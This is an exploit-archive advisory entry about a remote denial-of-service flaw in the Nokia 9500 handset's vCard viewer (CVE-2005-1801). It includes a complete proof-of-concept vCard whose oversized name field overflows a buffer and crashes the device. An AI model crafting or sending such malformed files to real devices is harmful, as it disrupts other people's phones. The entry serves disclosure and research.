Nokia 9500 - vCard Viewer Remote Denial of Service

Author: Marek Bialoglowy
type: dos
platform: hardware
port: 
date_added: 2005-05-26 
date_updated: 2013-05-27 
verified: 1 
codes: CVE-2005-1801;OSVDB-17033 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/13784/info

Nokia 9500 handset vCard viewer is affected by a remote denial of service vulnerability.

This issue presents itself when the device handles a malformed vCard and fails to perform boundary checks prior to copying user-supplied data into a finite sized buffer.

Successful exploitation of this issue requires user interaction as a user is asked to accept the vCard followed by manually opening it.

The following proof of concept vCard is available:
--- Nokia9500.vcf ---
BEGIN:VCARD
VERSION:2.1
N:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;BIALOGLOWY
FN:Marek Bialoglowy
ORG:INDEPENDENT
TITLE:COO
TEL;WORK;VOICE:+6221
TEL;WORK;FAX;
ADR;WORK;ENCODING=QUOTED-PRINTABLE:;;Indonesia
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:Indonesia
URL;WORK;
EMAIL;PREF;INTERNET:bialoglowy@gmail.com
REV:20050430T1958490
END:VCARD
--- Nokia9500.vcf ---